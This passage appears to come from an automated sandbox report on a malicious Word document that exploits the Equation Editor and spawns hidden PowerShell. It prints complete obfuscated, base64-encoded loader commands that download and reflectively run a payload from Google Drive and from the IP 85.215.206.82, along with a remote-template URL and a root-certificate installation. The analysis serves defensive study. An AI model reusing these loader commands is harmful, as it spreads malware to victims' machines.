ydkb3p0cywgenRzZGVzYXRpdmFkb3p0cywgenRzQ2FzUG9senRzLCB6dHNkZXNhdGl2YWRvenRzLCB6dHNkZScrJ3NhdGl2YWRvenRzLHp0c2Rlc2F0aXZhZG96dHMsenRzJysnZGVzYXRpdmFkb3p0cyx6dHNkZXNhdGl2YWRvenQnKydzLHp0c2Rlc2F0aXZhZG96dHMsJysnenRzZGVzYXRpdmFkb3p0cyx6dHMxenRzLHp0c2Rlc2F0aXZhZG96dHMpKTsnKS5yZXBsYWNFKCdhVUsnLCckJykucmVwbGFjRSgnenRzJyxbc1RSaW5HXVtjSEFyXTM5KS5yZXBsYWNFKCdkcmInLCd8Jyl8IC4gKCAkcFNIb01lWzIxXSskUFNob01FWzM0XSsnWCcp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('aUKimageUrl = ztshttps://d'+'rive.google.com/uc'+'?expo'+'rt=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur zts;'+'aUKwebClient = New-Object System.Net.WebClient;aUKimageBytes = aUKw'+'ebClient.DownloadData(aUKimageUrl);aUKimageTex'+'t = [System.Text.Encoding]::UTF8.GetString(aUKimageBytes);aUKstartFlag = zts<<BASE64_START>>zts;aUKendFlag'+' = zts<<BASE64_END>>zts;aUKstartIndex = aUKimageText.IndexOf(aUKstartFlag);aUKendIndex = aUKimageText.IndexOf(aUKendFlag);aUKstartIndex -ge 0 -and aUKendIndex -gt'+' '+'aUKstartIndex;aUKst'+'artIndex += aUKstartFlag.Leng'+'th;aUKbase64Length = aUKendIndex - aUKstartIndex;aUKba'+'se64Command = aUKimageText.Substring(aUKstartIndex, aUKbase64Length);aUKbase64Reversed = -join (aUKbase64Command.ToCharArray() drb ForEach-Object { aUK_ })[-1..-(aUKbase64Command.Length)];aUKcommandBytes = [System.Convert]'+'::FromBas'+'e64String(aUKbase64Reversed);aUKloadedAssembly = [System.Reflection.Assembly]'+'::Load(aUKcommandBytes);aUKvaiMethod = [dnlib.IO.Home].GetMet'+'hod(ztsVAIzts);aUKvaiMe'+'thod.Invoke(aUKnull, @(z'+'tstxt.ECDFFRW/072/28.602.512.58//:ptthzts, ztsdesativadozt'+'s, ztsdes'+'ativa'+'dozts, ztsdesativadozts, ztsCasPolzts, ztsdesativadozts, ztsde'+'sativadozts,ztsdesativadozts,zts'+'desativadozts,ztsdesativadozt'+'s,ztsdesativadozts,'+'ztsdesativadozts,zts1zts,ztsdesativadozts));').replacE('aUK','$').replacE('zts',[sTRinG][cHAr]39).replacE('drb','|')| . ( $pSHoMe[21]+$PShoME[34]+'X')"
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYSTEm32\WindOwsPoWErSHEll\v1.0\PoweRshELL.exE" "POWERsheLl -ex BYpass -nOp -W 1 -C dEvicECREdeNTiALDEplOYMeNt.eXe ; iex($(iEx('[SysTEM.tEXT.ENcODING]'+[Char]58+[chAr]58+'utf8.GeTStriNG([sysTem.CONVerT]'+[cHar]0X3A+[CHAr]0x3a+'FrOMBASE64STrINg('+[ChAR]0x22+'JEZYM0s5RDc1TktmICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtdHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFZklOSVRJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaGNrY1BoYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFXSkxTaU8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTUGl1VmssdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTXZ1bmphZ0RWLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYUt4U2tndUgpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiciIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lc1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEd4ZVNNVkJxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkRlgzSzlENzVOS2Y6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly84NS4yMTUuMjA2LjgyLzI3MC9pZ2V0YmVzdHRoaW5nc3dpdGhiZXN0cGljdHVyZXdpdGhncmVhdHRoaW5nc29ubWUudElGIiwiJEVudjpBUFBEQVRBXGdldGJlc3R0aGluZ3N3aXRoYmVzdHBpY3R1cmV3aXRoZ3JlYXR0aGluZ3Nvbi52YlMiLDAsMCk7U3RBclQtU2xlRVAoMyk7U1RBUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcZ2V0YmVzdHRoaW5nc3dpdGhiZXN0cGljdHVyZXdpdGhncmVhdHRoaW5nc29uLnZiUyI='+[cHAR]34+'))')))"Jump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdhVUtpbWFnZVVybCA9IHp0c2h0dHBzOi8vZCcrJ3JpdmUuZ29vZ2xlLmNvbS91YycrJz9leHBvJysncnQ9ZG93bmxvYWQmaWQ9MUFJVmdKSkp2MUY2dlM0c1VPeWJuSC1zRHZVaEJZd3VyIHp0czsnKydhVUt3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O2FVS2ltYWdlQnl0ZXMgPSBhVUt3JysnZWJDbGllbnQuRG93bmxvYWREYXRhKGFVS2ltYWdlVXJsKTthVUtpbWFnZVRleCcrJ3QgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyhhVUtpbWFnZUJ5dGVzKTthVUtzdGFydEZsYWcgPSB6dHM8PEJBU0U2NF9TVEFSVD4+enRzO2FVS2VuZEZsYWcnKycgPSB6dHM8PEJBU0U2NF9FTkQ+Pnp0czthVUtzdGFydEluZGV4ID0gYVVLaW1hZ2VUZXh0LkluZGV4T2YoYVVLc3RhcnRGbGFnKTthVUtlbmRJbmRleCA9IGFVS2ltYWdlVGV4dC5JbmRleE9mKGFVS2VuZEZsYWcpO2FVS3N0YXJ0SW5kZXggLWdlIDAgLWFuZCBhVUtlbmRJbmRleCAtZ3QnKycgJysnYVVLc3RhcnRJbmRleDthVUtzdCcrJ2FydEluZGV4ICs9IGFVS3N0YXJ0RmxhZy5MZW5nJysndGg7YVVLYmFzZTY0TGVuZ3RoID0gYVVLZW5kSW5kZXggLSBhVUtzdGFydEluZGV4O2FVS2JhJysnc2U2NENvbW1hbmQgPSBhVUtpbWFnZVRleHQuU3Vic3RyaW5nKGFVS3N0YXJ0SW5kZXgsIGFVS2Jhc2U2NExlbmd0aCk7YVVLYmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoYVVLYmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIGRyYiBGb3JFYWNoLU9iamVjdCB7IGFVS18gfSlbLTEuLi0oYVVLYmFzZTY0Q29tbWFuZC5MZW5ndGgpXTthVUtjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdJysnOjpGcm9tQmFzJysnZTY0U3RyaW5nKGFVS2Jhc2U2NFJldmVyc2VkKTthVUtsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV0nKyc6OkxvYWQoYVVLY29tbWFuZEJ5dGVzKTthVUt2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0JysnaG9kKHp0c1ZBSXp0cyk7YVVLdmFpTWUnKyd0aG9kLkludm9rZShhVUtudWxsLCBAKHonKyd0c3R4dC5FQ0RGRlJXLzA3Mi8yOC42MDIuNTEyLjU4Ly86cHR0aHp0cywgenRzZGVzYXRpdmFkb3p0JysncywgenRzZGVzJysnYXRpdmEnKydkb3p0cywgenRzZGVzYXRpdmFkb3p0cywgenRzQ2FzUG9senRzLCB6dHNkZXNhdGl2YWRvenRzLCB6dHNkZScrJ3NhdGl2YWRvenRzLHp0c2Rlc2F0aXZhZG96dHMsenRzJysnZGVzYXRpdmFkb3p0cyx6dHNkZXNhdGl2YWRvenQnKydzLHp0c2Rlc2F0aXZhZG96dHMsJysnenRzZGVzYXRpdmFkb3p0cyx6dHMxenRzLHp0c2Rlc2F0aXZhZG96dHMpKTsnKS5yZXBsYWNFKCdhVUsnLCckJykucmVwbGFjRSgnenRzJyxbc1RSaW5HXVtjSEFyXTM5KS5yZXBsYWNFKCdkcmInLCd8Jyl8IC4gKCAkcFNIb01lWzIxXSskUFNob01FWzM0XSsnWCcp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('aUKimageUrl = ztshttps://d'+'rive.google.com/uc'+'?expo'+'rt=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur zts;'+'aUKwebClient = New-Object System.Net.WebClient;aUKimageBytes = aUKw'+'ebClient.DownloadData(aUKimageUrl);aUKimageTex'+'t = [System.Text.Encoding]::UTF8.GetString(aUKimageBytes);aUKstartFlag = zts<<BASE64_START>>zts;aUKendFlag'+' = zts<<BASE64_END>>zts;aUKstartIndex = aUKimageText.IndexOf(aUKstartFlag);aUKendIndex = aUKimageText.IndexOf(aUKendFlag);aUKstartIndex -ge 0 -and aUKendIndex -gt'+' '+'aUKstartIndex;aUKst'+'artIndex += aUKstartFlag.Leng'+'th;aUKbase64Length = aUKendIndex - aUKstartIndex;aUKba'+'se64Command = aUKimageText.Substring(aUKstartIndex, aUKbase64Length);aUKbase64Reversed = -join (aUKbase64Command.ToCharArray() drb ForEach-Object { aUK_ })[-1..-(aUKbase64Command.Length)];aUKcommandBytes = [System.Convert]'+'::FromBas'+'e64String(aUKbase64Reversed);aUKloadedAssembly = [System.Reflection.Assembly]'+'::Load(aUKcommandBytes);aUKvaiMethod = [dnlib.IO.Home].GetMet'+'hod(ztsVAIzts);aUKvaiMe'+'thod.Invoke(aUKnull, @(z'+'tstxt.ECDFFRW/072/28.602.512.58//:ptthzts, ztsdesativadozt'+'s, ztsdes'+'ativa'+'dozts, ztsdesativadozts, ztsCasPolzts, ztsdesativadozts, ztsde'+'sativadozts,ztsdesativadozts,zts'+'desativadozts,ztsdesativadozt'+'s,ztsdesativadozts,'+'ztsdesativadozts,zts1zts,ztsdesativadozts));').replacE('aUK','$').replacE('zts',[sTRinG][cHAr]39).replacE('drb','|')| . ( $pSHoMe[21]+$PShoME[34]+'X')"Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\j0qjax5r\j0qjax5r.cmdline"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\j0qjax5r\j0qjax5r.cmdline"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,20_2_0041CBE1
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 8_2_008F748A push esi; ret 8_2_008F748B
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 8_2_008F5483 push ebp; ret 8_2_008F548F
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 8_2_008F7494 push esp; ret 8_2_008F74B3
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 8_2_008F5493 push ebp; ret 8_2_008F54AF
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 8_2_008F54BD push ebp; ret 8_2_008F54BF
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 8_2_008F54C6 push ebp; ret 8_2_008F546F
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 8_2_008F54C6 push ebp; ret 8_2_008F54CF
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 8_2_008F540C push ebp; ret 8_2_008F540F
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 8_2_008F5A1A push ebp; ret 8_2_008F5A1B
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 8_2_008F5024 push esp; ret 8_2_008F5047
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 8_2_008F5A22 push ebp; ret 8_2_008F5A23
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 8_2_008F5456 push ebp; ret 8_2_008F545F
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 8_2_008F5463 push ebp; ret 8_2_008F546F
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 8_2_008F81CD push ebp; ret 8_2_008F81CF
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 8_2_008F83CA push edi; ret 8_2_008F83CB
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 8_2_008F83C2 push edi; ret 8_2_008F83C3
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 8_2_008F81D5 push ebp; ret 8_2_008F81D7
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 8_2_008F83D2 push edi; ret 8_2_008F83D3
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 8_2_008E01F4 push eax; retf 8_2_008E01F5
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 8_2_008F550C push ebp; ret 8_2_008F550F
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 8_2_008E8F44 push eax; retf 8_2_008E8F61
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 8_2_00902167 push esp; ret 8_2_009023C7
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_007521E7 push ebx; iretd 11_2_007521EA
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_002621CD push ebx; iretd 19_2_002621EA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_00457186 push ecx; ret 20_2_00457199
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_0045E55D push esi; ret 20_2_0045E566
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_00457AA8 push eax; ret 20_2_00457AC6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_00434EB6 push ecx; ret 20_2_00434EC9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_10002806 push ecx; ret 20_2_10002819
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 22_2_0044693D push ecx; ret 22_2_0044694D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 22_2_0044DB70 push eax; ret 22_2_0044DB84

                  Persistence and Installation Behavior

                  barindex
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \Device\RdpDr\;:1\u4u.kids@SSL\DavWWWRootJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \Device\RdpDr\;:1\u4u.kids@SSL\DavWWWRootJump to behavior
                  Source: settings.xml.relsExtracted files from sample: https://u4u.kids/clm3hy?&sing=cuddly&brain=hapless&kingfish=perpetual&cake=scientific&bacon=kindhearted&jelly=pumped&reveal=reflective&clock=agonizing&yak
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile dump: deethebestthingwithmegreatattirudewithgreatthigns_________eniterlifewithgreatniceworkingskillwithmebgreatthignstobe________verynicepersonentiterlifewithnewthi[1].doc.0.drJump to dropped file
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile dump: 54D5D963.doc.0.drJump to dropped file
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXESection loaded: netapi32.dll and davhlpr.dll loadedJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_00406EEB ShellExecuteW,URLDownloadToFileW,20_2_00406EEB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\j0qjax5r\j0qjax5r.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,20_2_0041AADB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,20_2_0041CBE1
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
